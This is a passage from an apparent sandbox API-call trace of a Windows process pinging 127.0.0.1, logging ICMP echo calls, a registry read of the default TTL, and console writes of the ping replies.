nSize=0x50 | out: lpBuffer="䤐Â") returned 0x0 [0073.256] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x945500 | out: lpWSAData=0x945500) returned 0 [0073.258] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters", ulOptions=0x0, samDesired=0x1, phkResult=0xacf3b4 | out: phkResult=0xacf3b4*=0x88) returned 0x0 [0073.258] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultTTL", lpReserved=0x0, lpType=0xacf3a8, lpData=0xacf3b0, lpcbData=0xacf3ac*=0x4 | out: lpType=0xacf3a8*=0x0, lpData=0xacf3b0*=0x0, lpcbData=0xacf3ac*=0x4) returned 0x2 [0073.258] RegCloseKey (hKey=0x88) returned 0x0 [0073.258] GetAddrInfoW (in: pNodeName="127.1", pServiceName=0x0, pHints=0xacf378*(ai_flags=4, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xacf3b4 | out: ppResult=0xacf3b4*=0xc2c390*(ai_flags=4, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xc28940*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0)) returned 0 [0073.258] FreeAddrInfoW (pAddrInfo=0xc2c390*(ai_flags=4, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xc28940*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0)) [0073.258] IcmpCreateFile () returned 0xc269f8 [0073.261] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0xc2c250 [0073.261] LocalAlloc (uFlags=0x0, uBytes=0x1ff8) returned 0xc35270 [0073.261] GetNameInfoW (in: pSockaddr=0x945480*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), SockaddrLength=0x10, pNodeBuffer=0xacf4b0, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="127.0.0.1", pServiceBuffer=0x0) returned 0 [0073.262] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x274b, dwLanguageId=0x0, lpBuffer=0xacf3a8, nSize=0x0, Arguments=0xacf3a4 | out: lpBuffer="竈Ãﵼ¬┗\x94䰨盪❋") returned 0x14 [0073.263] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0073.263] _fileno (_File=0x76ea4c28) returned 1 [0073.263] _get_osfhandle (_FileHandle=1) returned 0x28 [0073.263] GetFileType (hFile=0x28) returned 0x2 [0073.263] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xacf36c | out: lpMode=0xacf36c) returned 0 [0073.263] GetLastError () returned 0x6 [0073.263] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xacf2d0, nSize=0x50 | out: lpBuffer="¬❋") returned 0x0 [0073.263] _fileno (_File=0x76ea4c28) returned 1 [0073.263] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0073.263] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPinging 127.0.0.1 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0073.263] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0xc37b00 [0073.263] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPinging 127.0.0.1 ", cchWideChar=-1, lpMultiByteStr=0xc37b00, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nPinging 127.0.0.1 ", lpUsedDefaultChar=0x0) returned 21 [0073.263] _fileno (_File=0x76ea4c28) returned 1 [0073.263] _write (in: _FileHandle=1, _Buf=0xc37b00*, _MaxCharCount=0x14 | out: _Buf=0xc37b00*) returned 20 [0073.263] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0073.263] _fileno (_File=0x76ea4c28) returned 1 [0073.263] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0073.263] LocalFree (hMem=0xc37b00) returned 0x0 [0073.263] LocalFree (hMem=0xc37ac8) returned 0x0 [0073.263] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x275a, dwLanguageId=0x0, lpBuffer=0xacf3a8, nSize=0x0, Arguments=0xacf3a4 | out: lpBuffer="竈Ãﵼ¬▪\x94䰨盪❚") returned 0x18 [0073.263] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0073.263] _fileno (_File=0x76ea4c28) returned 1 [0073.263] _get_osfhandle (_FileHandle=1) returned 0x28 [0073.263] GetFileType (hFile=0x28) returned 0x2 [0073.263] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xacf36c | out: lpMode=0xacf36c) returned 0 [0073.263] GetLastError () returned 0x6 [0073.263] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xacf2d0, nSize=0x50 | out: lpBuffer="¬❚") returned 0x0 [0073.263] _fileno (_File=0x76ea4c28) returned 1 [0073.263] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0073.263] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="with 32 bytes of data:\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0073.263] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0xc2c200 [0073.263] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="with 32 bytes of data:\r\n", cchWideChar=-1, lpMultiByteStr=0xc2c200, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="with 32 bytes of data:\r\n", lpUsedDefaultChar=0x0) returned 25 [0073.263] _fileno (_File=0x76ea4c28) returned 1 [0073.263] _write (in: _FileHandle=1, _Buf=0xc2c200*, _MaxCharCount=0x18 | out: _Buf=0xc2c200*) returned 24 [0073.263] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0073.263] _fileno (_File=0x76ea4c28) returned 1 [0073.263] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0073.263] LocalFree (hMem=0xc2c200) returned 0x0 [0073.263] LocalFree (hMem=0xc37ac8) returned 0x0 [0073.263] SetConsoleCtrlHandler (HandlerRoutine=0x941a3d, Add=1) returned 1 [0073.264] IcmpSendEcho2Ex (in: IcmpHandle=0xc269f8, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0xc2c250, RequestSize=0x20, RequestOptions=0xacf424, ReplyBuffer=0xc35270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0xc35270) returned 0x1 [0073.264] InetNtopW (in: Family=2, pAddr=0xacf414, pStringBuf=0xacf53c, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0073.265] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xacf3a8, nSize=0x0, Arguments=0xacf3a4 | out: lpBuffer="笈Ãﵼ¬⛔\x94䰨盪✣") returned 0x16 [0073.265] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0073.265] _fileno (_File=0x76ea4c28) returned 1 [0073.265] _get_osfhandle (_FileHandle=1) returned 0x28 [0073.265] GetFileType (hFile=0x28) returned 0x2 [0073.265] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xacf36c | out: lpMode=0xacf36c) returned 0 [0073.265] GetLastError () returned 0x6 [0073.265] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xacf2d0, nSize=0x50 | out: lpBuffer="¬✣") returned 0x0 [0073.265] _fileno (_File=0x76ea4c28) returned 1 [0073.265] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0073.265] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0073.265] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0xc37b40 [0073.265] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0xc37b40, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0073.265] _fileno (_File=0x76ea4c28) returned 1 [0073.265] _write (in: _FileHandle=1, _Buf=0xc37b40*, _MaxCharCount=0x16 | out: _Buf=0xc37b40*) returned 22 [0073.265] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0073.265] _fileno (_File=0x76ea4c28) returned 1 [0073.265] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0073.265] LocalFree (hMem=0xc37b40) returned 0x0 [0073.265] LocalFree (hMem=0xc37b08) returned 0x0 [0073.265] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0xacf3a8, nSize=0x0, Arguments=0xacf3a4 | out: lpBuffer="笈Ãﵼ¬⛿\x94䰨盪✼") returned 0x9 [0073.265] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0073.265] _fileno (_File=0x76ea4c28) returned 1 [0073.265] _get_osfhandle (_FileHandle=1) returned 0x28 [0073.265] GetFileType (hFile=0x28) returned 0x2 [0073.265] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xacf36c | out: lpMode=0xacf36c) returned 0 [0073.265] GetLastError () returned 0x6 [0073.265] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xacf2d0, nSize=0x50 | out: lpBuffer="¬✼") returned 0x0 [0073.265] _fileno (_File=0x76ea4c28) returned 1 [0073.265] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0073.265] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0073.265] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xc289e8 [0073.265] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0xc289e8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0073.265] _fileno (_File=0x76ea4c28) returned 1 [0073.265] _write (in: _FileHandle=1, _Buf=0xc289e8*, _MaxCharCount=0x9 | out: _Buf=0xc289e8*) returned 9 [0073.265] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0073.265] _fileno (_File=0x76ea4c28) returned 1 [0073.265] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0073.265] LocalFree (hMem=0xc289e8) returned 0x0 [0073.265] LocalFree (hMem=0xc37b08) returned 0x0 [0073.265] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xacf3ac, nSize=0x0, Arguments=0xacf3a8 | out: lpBuffer="笈Ãﵼ¬➷\x94䰨盪✧") returned 0x9 [0073.265] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0073.265] _fileno (_File=0x76ea4c28) returned 1 [0073.265] _get_osfhandle (_FileHandle=1) returned 0x28 [0073.265] GetFileType (hFile=0x28) returned 0x2 [0073.265] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xacf370 | out: lpMode=0xacf370) returned 0 [0073.265] GetLastError () returned 0x6 [0073.266] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xacf2d4, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0073.266] _fileno (_File=0x76ea4c28) returned 1 [0073.266] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0073.266] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0073.266] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xc28940 [0073.266] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0xc28940, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0073.266] _fileno (_File=0x76ea4c28) returned 1 [0073.266] _write (in: _FileHandle=1, _Buf=0xc28940*, _MaxCharCount=0x9 | out: _Buf=0xc28940*) returned 9 [0073.266] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0073.266] _fileno (_File=0x76ea4c28) returned 1 [0073.266] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0073.266] LocalFree (hMem=0xc28940) returned 0x0 [0073.266] LocalFree (hMem=0xc37b08) returned 0x0 [0073.266] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0xacf3a8, nSize=0x0, Arguments=0xacf3a4 | out: lpBuffer="笈Ãﵼ¬⟘\x94䰨盪✨") returned 0x9 [0073.266] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0073.266] _fileno (_File=0x76ea4c28) returned 1 [0073.266] _get_osfhandle (_FileHandle=1) returned 0x28 [0073.266] GetFileType (hFile=0x28) returned 0x2 [0073.266] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xacf36c | out: lpMode=0xacf36c) returned 0 [0073.266] GetLastError () returned 0x6 [0073.266] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xacf2d0, nSize=0x50 | out: lpBuffer="¬✨") returned 0x0 [0073.266] _fileno (_File=0x76ea4c28) returned 1 [0073.266] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0073.266] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0073.266] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xc28ac0 [0073.266] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0xc28ac0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0073.266] _fileno (_File=0x76ea4c28) returned 1 [0073.266] _write (in: _FileHandle=1, _Buf=0xc28ac0*, _MaxCharCount=0x9 | out: _Buf=0xc28ac0*) returned 9 [0073.266] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0073.266] _fileno (_File=0x76ea4c28) returned 1 [0073.266] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0073.266] LocalFree (hMem=0xc28ac0) returned 0x0 [0073.266] LocalFree (hMem=0xc37b08) returned 0x0 [0073.266] Sleep (dwMilliseconds=0x3e8) [0074.282] IcmpSendEcho2Ex (in: IcmpHandle=0xc269f8, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0xc2c250, RequestSize=0x20, RequestOptions=0xacf424, ReplyBuffer=0xc35270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0xc35270) returned 0x1 [0074.283] InetNtopW (in: Family=2, pAddr=0xacf414, pStringBuf=0xacf53c, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0074.283] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xacf3a8, nSize=0x0, Arguments=0xacf3a4 | out: lpBuffer="羠Ãﵼ¬⛔\x94䰨盪✣") returned 0x16 [0074.283] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0074.283] _fileno (_File=0x76ea4c28) returned 1 [0074.283] _get_osfhandle (_FileHandle=1) returned 0x28 [0074.283] GetFileType (hFile=0x28) returned 0x2 [0074.283] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xacf36c | out: lpMode=0xacf36c) returned 0 [0074.283] GetLastError () returned 0x6 [0074.283] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xacf2d0, nSize=0x50 | out: lpBuffer="¬✣") returned 0x0 [0074.283] _fileno (_File=0x76ea4c28) returned 1 [0074.283] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0074.283] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0074.283] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0xc37fd8 [0074.283] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0xc37fd8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0074.283] _fileno (_File=0x76ea4c28) returned 1 [0074.283] _write (in: _FileHandle=1, _Buf=0xc37fd8*, _MaxCharCount=0x16 | out: _Buf=0xc37fd8*) returned 22 [0074.283] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0074.283] _fileno (_File=0x76ea4c28) returned 1 [0074.283] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0074.283] LocalFree (hMem=0xc37fd8) returned 0x0 [0074.283] LocalFree (hMem=0xc37fa0) returned 0x0 [0074.283] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0xacf3a8, nSize=0x0, Arguments=0xacf3a4 | out: lpBuffer="羠Ãﵼ¬⛿\x94䰨盪✼") returned 0x9 [0074.283] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0074.283] _fileno (_File=0x76ea4c28) returned 1 [0074.284] _get_osfhandle (_FileHandle=1) returned 0x28 [0074.284] GetFileType (hFile=0x28) returned 0x2 [0074.284] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xacf36c | out: lpMode=0xacf36c) returned 0 [0074.284] GetLastError () returned 0x6 [0074.284] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xacf2d0, nSize=0x50 | out: lpBuffer="¬✼") returned 0x0 [0074.284] _fileno (_File=0x76ea4c28) returned 1 [0074.284] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0074.284] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0074.284] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xc28940 [0074.284] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0xc28940, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0074.284] _fileno (_File=0x76ea4c28) returned 1 [0074.284] _write (in: _FileHandle=1, _Buf=0xc28940*, _MaxCharCount=0x9 | out: _Buf=0xc28940*) returned 9 [0074.284] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0074.284] _fileno (_File=0x76ea4c28) returned 1 [0074.284] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0074.284] LocalFree (hMem=0xc28940) returned 0x0 [0074.284] LocalFree (hMem=0xc37fa0) returned 0x0 [0074.284] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xacf3ac, nSize=0x0, Arguments=0xacf3a8 | out: lpBuffer="羠Ãﵼ¬➷\x94䰨盪✧") returned 0x9 [0074.284] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0074.284] _fileno (_File=0x76ea4c28) returned 1 [0074.284] _get_osfhandle (_FileHandle=1) returned 0x28 [0074.284] GetFileType (hFile=0x28) returned 0x2 [0074.284] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xacf370 | out: lpMode=0xacf370) returned 0 [0074.284] GetLastError () returned 0x6 [0074.284] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xacf2d4, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0074.284] _fileno (_File=0x76ea4c28) returned 1 [0074.284] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0074.284] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0074.284] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xc28ac0 [0074.284] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0xc28ac0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0074.284] _fileno (_File=0x76ea4c28) returned 1 [0074.284] _write (in: _FileHandle=1, _Buf=0xc28ac0*, _MaxCharCount=0x9 | out: _Buf=0xc28ac0*) returned 9 [0074.284] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0074.284] _fileno (_File=0x76ea4c28) returned 1 [0074.284] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0074.284] LocalFree (hMem=0xc28ac0) returned 0x0 [0074.284] LocalFree (hMem=0xc37fa0) returned 0x0 [0074.284] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0xacf3a8, nSize=0x0, Arguments=0xacf3a4 | out: lpBuffer="羠Ãﵼ¬⟘\x94䰨盪✨") returned 0x9 [0074.284] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0074.284] _fileno (_File=0x76ea4c28) returned 1 [0074.284] _get_osfhandle (_FileHandle=1) returned 0x28 [0074.284] GetFileType (hFile=0x28) returned 0x2 [0074.284] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xacf36c | out: lpMode=0xacf36c) returned 0 [0074.284] GetLastError () returned 0x6 [0074.284] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xacf2d0, nSize=0x50 | out: lpBuffer="¬✨") returned 0x0 [0074.284] _fileno (_File=0x76ea4c28) returned 1 [0074.284] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0074.284] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0074.284] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xc28ac0 [0074.284] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0xc28ac0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0074.284] _fileno (_File=0x76ea4c28) returned 1 [0074.284] _write (in: _FileHandle=1, _Buf=0xc28ac0*, _MaxCharCount=0x9 | out: _Buf=0xc28ac0*) returned 9 [0074.285] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0074.285] _fileno (_File=0x76ea4c28) returned 1 [0074.285] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0074.285] LocalFree (hMem=0xc28ac0) returned 0x0 [0074.285] LocalFree (hMem=0xc37fa0) returned 0x0 [0074.285] Sleep (dwMilliseconds=0x3e8) [0075.298] IcmpSendEcho2Ex (in: IcmpHandle=0xc269f8, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0xc2c250, RequestSize=0x20, RequestOptions=0xacf424, ReplyBuffer=0xc35270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0xc35270) returned 0x1 [0075.299] InetNtopW (in: Family=2, pAddr=0xacf414, pStringBuf=0xacf53c, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0075.299] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xacf3a8, nSize=0x0, Arguments=0xacf3a4 | out: lpBuffer="羠Ãﵼ¬⛔\x94䰨盪✣") returned 0x16 [0075.299] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0075.299] _fileno (_File=0x76ea4c28) returned 1 [0075.299] _get_osfhandle (_FileHandle=1) returned 0x28 [0075.299] GetFileType (hFile=0x28) returned 0x2 [0075.299] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xacf36c | out: lpMode=0xacf36c) returned 0 [0075.299] GetLastError () returned 0x6 [0075.299] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xacf2d0, nSize=0x50 | out: lpBuffer="¬✣") returned 0x0 [0075.299] _fileno (_File=0x76ea4c28) returned 1 [0075.299] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0075.299] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0075.299] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0xc37fd8 [0075.299] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0xc37fd8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0075.299] _fileno (_File=0x76ea4c28) returned 1 [0075.299] _write (in: _FileHandle=1, _Buf=0xc37fd8*, _MaxCharCount=0x16 | out: _Buf=0xc37fd8*) returned 22 [0075.299] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0075.299] _fileno (_File=0x76ea4c28) returned 1 [0075.299] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0075.299] LocalFree (hMem=0xc37fd8) returned 0x0 [0075.299] LocalFree (hMem=0xc37fa0) returned 0x0 [0075.299] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0xacf3a8, nSize=0x0, Arguments=0xacf3a4 | out: lpBuffer="羠Ãﵼ¬⛿\x94䰨盪✼") returned 0x9 [0075.299] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0075.299] _fileno (_File=0x76ea4c28) returned 1 [0075.299] _get_osfhandle (_FileHandle=1) returned 0x28 [0075.299] GetFileType (hFile=0x28) returned 0x2 [0075.299] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xacf36c | out: lpMode=0xacf36c) returned 0 [0075.299] GetLastError () returned 0x6 [0075.299] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xacf2d0, nSize=0x50 | out: lpBuffer="¬✼") returned 0x0 [0075.299] _fileno (_File=0x76ea4c28) returned 1 [0075.299] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0075.299] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, 